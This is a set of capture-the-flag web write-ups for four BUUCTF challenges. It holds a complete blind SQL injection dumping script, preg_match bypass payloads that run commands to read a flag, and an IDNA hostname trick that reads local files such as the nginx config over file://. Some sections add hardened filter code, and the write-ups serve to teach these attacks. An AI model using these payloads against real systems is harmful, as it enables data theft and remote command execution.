buuctf.web 64-96

1. [WUSTCTF2020]颜值成绩查询 (appearance-score lookup)

Key point: SQL injection, boolean-based blind

Solution:

(1) Inputs 1 through 4 each return a record; 5 returns nothing. That is a true/false oracle, so this is boolean-based blind injection. The script below passes the whole comparison as the stunum value, so it evaluates to 1 (an existing id, the page shows "Hi") or 0 (no row, nothing shown), and a binary search over ascii(substr(...)) recovers each character in about seven requests.
Reference link

```python
import time
import requests

# The page answers "Hi ..." when stunum selects an existing row. The injected
# comparison is the whole stunum value, so it evaluates to 1 (an existing id,
# "Hi" shown) or 0 (no row, nothing shown): a one-bit boolean oracle.
Success_message = "Hi"
url = ""  # base URL of the challenge, set from input() in __main__


def database_name():
    db_name = ''
    for i in range(1, 10):
        # binary search over printable ASCII 32..126 of ascii(substr(..., i, 1))
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + "?stunum=(ascii(substr(database(), %d, 1)) > %d)" % (i, mid)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            # past the end of the string ascii('') is 0, so every "> mid" answer is
            # false and the search collapses to 32: treat that as the terminator
            print()
            break
        db_name += chr(mid)
        print("database name: " + db_name)
    return db_name


def table_name():
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(table_name))from(' \
                            'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print("table names: " + name)
    table_list = name.split(",")
    for tab_name in table_list:
        column_name(tab_name)


def column_name(tab_name):
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(column_name))from(' \
                            'information_schema.columns)where(table_name="%s")and(table_schema=database())), %d, ' \
                            '1)) > %d)' % (tab_name, j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print("columns of table %s: %s" % (tab_name, name))
    column_list = name.split(",")
    for col_name in column_list:
        get_data(tab_name, col_name)


def get_data(tab_name, col_name):
    # select(col)from(tab) must yield a single row; for a multi-row table wrap the
    # column in group_concat() or add a limit, otherwise the subquery errors out
    # and every character reads as the terminator
    data = ''
    for i in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(%s)from(%s)),%d,1)) > %d)' % (
                col_name, tab_name, i, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        data += chr(mid)
        print("%s.%s: %s" % (tab_name, col_name, data))


if __name__ == '__main__':
    url = input("Enter the URL (without query string): ")
    database_name()
    table_name()
```

2. [FBCTF2019]RCEService

Key point: RCE, bypassing a preg_match filter

Solution:

(1) The page asks for JSON input; send

```json
{"cmd":"ls"}
```

It echoes index.php, so the backend is PHP. Other commands come back filtered, which points to a regex blacklist checked with preg_match. There are two ways past preg_match.

(2) Method 1: exhaust PCRE's backtrack limit (PCRE backtrack-limit bypass).

The English PHP manual documents pcre.backtrack_limit in php.ini with a default of 1000000. When a match exceeds it, preg_match returns false rather than 0 or 1, so a check of the form `if (preg_match(...))` is skipped. Python script:

```python
import requests

# a second key whose value exceeds pcre.backtrack_limit (1000000) pushes the greedy
# scan over the limit; preg_match then returns false and the blacklist never fires,
# while json_decode still reads "cmd" normally
payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a" * 1000000 + '"}'
res = requests.post("http://78850bfd-7aa8-4e32-bfab-181f587057c5.node4.buuoj.cn:81/", data={"cmd": payload})
print(res.text)
```

(3) Method 2: in PCRE `.` does not match a newline unless the s modifier is set, and without m the anchors ^ and $ apply only to the whole string, so a blacklist that relies on `.*` to reach the keyword cannot match once the command sits on its own line. json_decode treats the newline (%0A) as ordinary whitespace:

```text
/?cmd={%0A"cmd": "ls /home"%0A}
/?cmd={%0A"cmd": "/bin/cat /home/rceservice/flag"%0A}
```
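Both bypasses next to a corrected check, as an added example in Python (not the challenge's PHP, which is not on the page). The challenge's real pattern is unknown, so `BLACKLIST` is an assumed stand-in of the same shape (anchored ^...$, greedy .*, no s flag). Python's `re` shares the newline semantics method 2 exploits, so that bypass is reproduced directly; Python has no pcre.backtrack_limit, so the method 1 payload is only built and checked to still decode. All function names here are constructed for this example.

```python
import json
import re
from typing import Optional

# Assumed stand-in for the challenge's blacklist (not on the page): same shape,
# anchored with ^ and $, greedy .*, compiled without DOTALL (PCRE without /s).
BLACKLIST = re.compile(r'^.*(cat|ls|flag|;|\|).*$')
PCRE_BACKTRACK_LIMIT = 1000000   # php.ini default for pcre.backtrack_limit


def vulnerable_filter(body: str) -> bool:
    """Challenge-style check on the raw request body. True means blocked."""
    return BLACKLIST.search(body) is not None


def decoded_cmd(body: str) -> Optional[str]:
    """The value the application actually executes: the "cmd" string of the JSON
    object, or None if the body is not a JSON object carrying a string cmd."""
    try:
        obj = json.loads(body)
    except ValueError:
        return None
    cmd = obj.get("cmd") if isinstance(obj, dict) else None
    return cmd if isinstance(cmd, str) else None


def newline_bypass(cmd: str) -> str:
    """Method 2: put the command on its own line. Without /s '.' cannot cross '\\n'
    and without /m '^' and '$' anchor only at the ends of the whole body, so
    ^.*(...).*$ never reaches the keyword; the JSON parser treats the newlines as
    whitespace."""
    return '{\n"cmd": %s\n}' % json.dumps(cmd)


def backtrack_payload(cmd: str, limit: int = PCRE_BACKTRACK_LIMIT) -> str:
    """Method 1: add a second key longer than pcre.backtrack_limit. In PHP the greedy
    scan exceeds the limit, preg_match() returns false (not 0) and
    `if (preg_match(...))` falls through. Python's re has no such limit, so only
    the payload is built here."""
    return json.dumps({"cmd": cmd, "zz": "a" * limit})


def hardened_filter(body: str, max_body: int = 4096) -> bool:
    """Fix for both: bound the body size before any regex runs, decode first, then
    inspect the actual cmd value with an unanchored search. Line breaks in the
    surrounding JSON no longer matter, and an oversized body is refused before it
    can push the matcher over its limit."""
    if len(body) > max_body:
        return True
    cmd = decoded_cmd(body)
    if cmd is None:
        return True
    return re.search(r'cat|ls|flag|;|\|', cmd) is not None


if __name__ == '__main__':
    body = newline_bypass('ls /home')
    print(repr(body), 'blocked by vulnerable filter:', vulnerable_filter(body))
    print('cmd the app would run:', decoded_cmd(body))
    print('blocked by hardened filter:', hardened_filter(body))
```

The general lesson is the second function: validate the value you are about to execute, after decoding, rather than the raw transport encoding it arrived in.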

3. [SUCTF 2019]Pythonginx

Key point: Unicode to IDNA conversion splitting the hostname

Solution:

(1) Challenge source (the handler, with the imports it needs):

```python
from urllib import parse
from urllib.parse import urlsplit, urlunsplit
import urllib.request
from flask import Flask, request

app = Flask(__name__)


@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        # per-label IDNA encoding: this is where NFKC-compatible characters
        # turn into ASCII that the two checks above never saw
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    # strip spaces from the url
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
```

(2) The task is to get past the IDNA conversion.

Bypass method 1:

Unicode has characters such as ℀ (U+2100) whose NFKC compatibility form is the ASCII sequence a/c, and IDNA's nameprep applies NFKC before encoding. The per-label encode('idna') in the handler therefore turns a host containing such a character into one with a slash in it. The payload uses ℆ (U+2106), which maps to c/u: the netloc suctf.c℆sr passes checks 1 and 2 untouched, encodes to suctf.cc/usr, and urlunsplit rebuilds a URL whose hostname is suctf.cc with /usr prepended to the path. The third check passes and urlopen reads a local file. Read the nginx config first, then the flag:

```text
?url=file://suctf.c℆sr/local/nginx/conf/nginx.conf
file://suctf.c℆sr/fffffflag
```

Method 2: find other Unicode characters that IDNA's nameprep (NFKC) maps to the letter c, so that suctf.c<char> passes the first two checks and only becomes suctf.cc after encoding. This scanner runs the handler's own checks locally over every BMP code point:

```python
from urllib.parse import urlparse, urlunsplit, urlsplit


def get_unicode():
    # try every BMP code point as the last character of the host
    for x in range(65536):
        uni = chr(x)
        url = "http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: " + uni + " unicode: \\u%04x" % x)
        except Exception:
            # urlparse and the idna codec reject many code points (since the
            # bpo-36216 fix urlsplit also raises ValueError when NFKC would add a
            # separator such as '/'); skip them
            pass


def getUrl(url):
    # the handler's three checks; True means the final fetch would happen
    host = urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return False
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False


if __name__ == "__main__":
    get_unicode()
```
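The label mapping, the handler's check order and a corrected version side by side, as an added example that is not part of the original writeup. `challenge_pipeline` replays the three checks of the source above (assumed faithful to it) and `canonical_host` is a constructed hardened form. One caveat a reader running this today needs: since the 2019 fix for bpo-36216 (CVE-2019-9636) CPython's urlsplit refuses a netloc whose NFKC form would introduce '/', '?', '#', '@' or ':', so the ℆ (U+2106) payload dies at check 1 on a current interpreter, while a confusable that merely normalizes to a letter, such as ⓒ (U+24D2), still gets through.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# a plain LDH label: letters, digits, hyphens, 1-63 chars, no leading/trailing hyphen
LDH_LABEL = re.compile(r'(?!-)[a-z0-9-]{1,63}(?<!-)')


def idna_label(label: str) -> str:
    """What the handler's h.encode('idna').decode() does to one label."""
    return label.encode('idna').decode('ascii')


def challenge_pipeline(url: str):
    """Replay the three checks of getUrl() from the source above.
    Returns ('fetch', host) when urlopen() would run, ('blocked', None) when check 1
    or 2 stops it, and ('urlsplit-rejected', None) when urlsplit refuses the netloc."""
    try:
        if urlsplit(url).hostname == 'suctf.cc':            # check 1: parsed hostname
            return ('blocked', None)
        parts = list(urlsplit(url))
        if parts[1] == 'suctf.cc':                          # check 2: raw netloc
            return ('blocked', None)
        parts[1] = '.'.join(idna_label(h) for h in parts[1].split('.'))
        final_url = urlunsplit(parts).split(' ')[0]
        host = urlsplit(final_url).hostname                 # check 3: rebuilt URL
        return ('fetch', host) if host == 'suctf.cc' else ('blocked', None)
    except ValueError:
        # CPython since the bpo-36216 / CVE-2019-9636 fix: urlsplit rejects a netloc
        # whose NFKC form would add '/', '?', '#', '@' or ':'. The idna codec alone
        # (idna_label) still maps ℆ to c/u; it is urlsplit that refuses the URL.
        return ('urlsplit-rejected', None)


def canonical_host(url: str):
    """Hardened form: canonicalize first, decide once. Every label is IDNA-encoded and
    must come out as a plain LDH label; the caller applies its allow/deny policy to
    the returned canonical host, so a confusable such as suctf.cⓒ is judged as
    suctf.cc. Returns None when the host is refused."""
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return None
    if not host:
        return None
    labels = []
    for label in host.split('.'):
        try:
            ascii_label = idna_label(label)
        except UnicodeError:
            return None
        if not LDH_LABEL.fullmatch(ascii_label):
            return None
        labels.append(ascii_label)
    return '.'.join(labels)


if __name__ == '__main__':
    for u in ('http://suctf.cc/', 'http://suctf.cⓒ/', 'file://suctf.c℆sr/fffffflag'):
        print(u, challenge_pipeline(u), canonical_host(u))
```

The order of operations is the whole bug: the handler compares before it normalizes and then fetches after. `canonical_host` normalizes once, rejects anything that is not a clean LDH label afterwards, and leaves a single comparison for the policy to make on the string that will actually be used.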

4. [0CTF 2016]piapiapia

Key point: deserialization string escape (length-change injection)

Solution: reference link

To be continued.
